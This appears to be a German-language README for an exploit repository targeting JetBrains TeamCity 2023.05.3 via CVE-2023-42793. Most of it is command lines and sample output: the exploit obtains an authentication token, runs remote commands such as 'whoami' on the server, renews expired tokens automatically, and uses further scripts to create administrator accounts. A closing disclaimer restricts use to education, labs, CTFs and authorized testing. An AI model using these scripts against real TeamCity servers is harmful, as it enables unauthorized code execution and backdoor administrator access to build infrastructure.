
TeamCity 2023.05.3 - CVE-2023-42793 - Benutzernamen administrator erstellen.
Beispiel für die Befehlsausführung:
python3 exploit.py -u http://localhost
User add token -> eyJ0eXAiOiAiVENWMiJ9.YkZ0V2tzR3NvWXhZelRfZTN0cFF1SkZjVWVz.N2M0Njk2ZTgtNWZhYi00MTU5LWJmZjQtYWU1MDFlYzZiMGY1
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser
StdErr:
Exit code: 0
Time: 16ms
Command -> ls -la /home
StdOut:total 8
drwxr-xr-x 2 root root 4096 Apr 15 2020 .
drwxr-xr-x 1 root root 4096 Feb 28 2024 ..
StdErr:
Exit code: 0
Time: 23ms
Falls das Token abläuft, wird automatisch ein neues erstellt.
Command -> whoami
[-] Token expired, restarting...
[!]Error deleting user
User add token -> eyJ0eXAiOiAiVENWMiJ9.ZVJiSTB6SGZWSEpldzhEa1o4cUdsWFlQRTJJ.NGQxOTg4ZWItNTJmYS00OWM3LWIwYmItZjcyODNkYjg5NTJj
Successful execution, preparing for the RCE
Command -> whoami
StdOut:tcuser
StdErr:
Exit code: 0
Time: 24ms
Administrator-Benutzernamen erstellen:
python3 user_add_administrator.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token -> eyJ0eXAiOiAiVENWMiJ9.Z21xU3ZtTXNYUXE2WGdkaWJCOFV4QWsxN2s0.NmMyZDE0YTItMDQ1OS00NGQ2LTk2YWEtNjg1MTU3ZGNiNjM0
Create username administrator
Falls bereits ein Benutzer existiert:
python3 user_add.py -t http://127.0.0.1 -u cxdxnt -p testing -u [email protected]
User add token -> eyJ0eXAiOiAiVENWMiJ9.Q3ZFa0ExR2tBcGlSMUZ3ZWNyMUtNN0VPQmFN.Mzk0M2EyZjAtMzVhNi00YTU0LWFmNTctMTg4MThkZmU5MDA3
is already in use by some other user.
Dieses Repository dient ausschließlich Bildungs- und Forschungszwecken im Bereich Computersicherheit. Die Verwendung der hier beschriebenen Skripte und Techniken, um Systeme ohne Autorisierung zu kompromittieren, ist illegal und verstößt gegen nationale und internationale Gesetze, wie etwa das Gesetz 26.388 (Argentinien), den CFAA (USA) und die Budapest-Konvention.
Der Autor ist nicht für den Missbrauch der hier bereitgestellten Informationen verantwortlich. Die Nutzung dieses Materials ist nur in kontrollierten Umgebungen, Laboren, CTFs oder mit ausdrücklicher Genehmigung des Systemeigentümers gestattet.
Wenn Sie Tests durchführen möchten, stellen Sie sicher, dass Sie die Erlaubnis haben. Hacking ohne Autorisierung ist kein ethisches Hacking; es ist ein Verbrechen.